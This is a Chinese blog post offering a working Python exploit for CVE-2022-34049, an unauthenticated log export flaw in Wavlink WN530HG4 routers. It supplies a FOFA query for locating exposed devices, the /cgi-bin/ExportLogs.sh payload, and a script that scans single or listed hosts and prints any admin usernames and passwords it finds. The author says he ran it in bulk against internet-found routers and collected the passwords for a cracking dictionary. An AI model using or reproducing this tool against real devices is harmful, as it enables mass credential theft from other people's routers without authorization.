学python得永生,python大法好之利用python编写CVE-2022-34049 poc
漏洞说明
Wavlink WN530HG4 M30HG4.V5030.191116中存在访问控制问题,未经验证的攻击者可以下载日志文件和配置数据。
影响版本
Wavlink WN530HG4 M30HG4.V5030.191116
漏洞复现fofa:title="Wi-Fi APP Login"
payload:/cgi-bin/ExportLogs.sh
POC
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import requests
import argparse
import sys
import re
import urllib3
# Module-level side effect: silences urllib3's InsecureRequestWarning, which
# would otherwise be printed on every request made with verify=False below.
urllib3.disable_warnings()
def title():
    """Print the tool's ASCII-art banner and author credit to stdout.

    The banner is a plain (non-raw) triple-quoted string that contains
    backslash sequences such as "\\ " and "\\_"; they are not valid escapes,
    so newer Python versions emit a SyntaxWarning for them (a raw string
    would avoid that). The text itself is unchanged.
    """
    print("""
_____ __ __ ______ ___ ___ ___ ___ ____ _ _ ___ _ _ ___
/ ____|\ \ / /| ____| |__ \ / _ \ |__ \ |__ \ |___ \ | || | / _ \ | || | / _ \
| | \ \ / / | |__ ______ ) || | | | ) | ) | ______ __) || || |_ | | | || || |_ | (_) |
| | \ \/ / | __| |______| / / | | | | / / / / |______| |__ < |__ _|| | | ||__ _| \__, |
| |____ \ / | |____ / /_ | |_| | / /_ / /_ ___) | | | | |_| | | | / /
\_____| \/ |______| |____| \___/ |____||____| |____/ |_| \___/ |_| /_/
Author:Henry4E36
""")
class information(object):
    """Check one or more hosts for the CVE-2022-34049 unauthenticated log export.

    Wraps the argparse namespace built in ``__main__``: ``args.url`` is a
    single target base URL, ``args.file`` a path to a file with one host per
    line. Only those two attributes are read.
    """

    def __init__(self, args):
        # Keep the whole namespace, but cache the two values the methods use.
        self.args = args
        self.url = args.url
        self.file = args.file

    def target_url(self):
        """Send one GET to ``/cgi-bin/ExportLogs.sh`` on ``self.url`` and report.

        The probe is a single unauthenticated GET (no session cookie, no
        credentials). A 200 reply whose body contains both "Login" and
        "Password" is reported as vulnerable and the first ``Login=`` /
        ``Password=`` values found in the body are printed; any other reply
        is reported as not vulnerable. Every exception is caught and printed
        as a connection error, so timeouts, refused connections and an
        IndexError from a regex with no match all look the same to the user.

        From a defender's side the request is easy to recognise: the only
        distinguishing features are the path and the fixed User-Agent below.
        """
        target_url = self.url + "/cgi-bin/ExportLogs.sh"
        # Static desktop User-Agent; nothing else in the request is tuned.
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
        }
        try:
            # verify=False disables TLS certificate validation (the warning
            # is suppressed at import time); timeout=5 bounds each probe.
            res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
            if res.status_code == 200 and "Login" in res.text and "Password" in res.text:
                print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在Wavlink 导出日志配置未授权访问下载漏洞\033[0m")
                # Unanchored, greedy ".*": captures the remainder of the line
                # after "Login=" / "Password=", including any trailing "\r".
                pattern1 = re.compile(r"Login=(.*)")
                pattern2 = re.compile(r"Password=(.*)")
                # NOTE(review): the guard above only checks that the words
                # "Login"/"Password" occur; if "Login=" or "Password=" is
                # absent, findall() returns [] and [0] raises IndexError,
                # which the except clause below misreports as 连接错误.
                username = pattern1.findall(res.text)[0]
                password = pattern2.findall(res.text)[0]
                print(f"\033[31m[{chr(8730)}] 用户名: {username} 密码:{password}\033[0m")
                print("[" + "-"*100 + "]")
            else:
                print(f"[\033[31mx\033[0m] 目标系统: {self.url} 不存在Wavlink 导出日志配置未授权访问下载漏洞")
                print("[" + "-"*100 + "]")
        except Exception as e:
            # Broad catch; ``e`` is discarded, so the actual cause is never shown.
            print("[\033[31mX\033[0m] 连接错误!")
            print("[" + "-"*100 + "]")

    def file_url(self):
        """Run ``target_url`` once for every host listed in ``self.file``.

        Each line is stripped of surrounding whitespace; a line that does not
        start with "http" gets an "http://" prefix ("https://..." lines are
        left as they are). ``self.url`` is overwritten for each line, so the
        instance ends up pointing at the last host in the file.
        """
        # No encoding argument: the file is decoded with the platform default.
        with open(self.file, "r") as urls:
            for url in urls:
                url = url.strip()
                if url[:4] != "http":
                    url = "http://" + url
                # Second strip() is redundant; ``url`` was already stripped.
                self.url = url.strip()
                # Equivalent to self.target_url(); calling through the class
                # is just the non-idiomatic spelling.
                information.target_url(self)
if __name__ == "__main__":
    title()
    # NOTE(review): chained assignment binds the same parser object to both
    # ``parser`` and the otherwise unused name ``ar``.
    parser = ar=argparse.ArgumentParser(description=' Wavlink 导出日志配置未授权访问下载')
    parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:\"http://127.0.0.1\"")
    parser.add_argument("-f", "--file", metavar="file", help="Targets in file eg:\"ip.txt\"")
    args = parser.parse_args()
    # Exactly one option and its value are expected (script name + 2 argv
    # entries). The check runs after parse_args(), so argparse's own error
    # handling and -h take precedence; any other argv length prints usage.
    if len(sys.argv) != 3:
        print(
            "[-] 参数错误!\neg1:>>>python3 CVE-2022-34049.py -u http://127.0.0.1\neg2:>>>python3 CVE-2022-34049.py -f ip.txt")
    elif args.url:
        # Single target.
        information(args).target_url()
    elif args.file:
        # One host per line.
        information(args).file_url()
利用fofa搜集的数据,批量跑了一下数据,把password字段收集下来,可以补充到字典里去。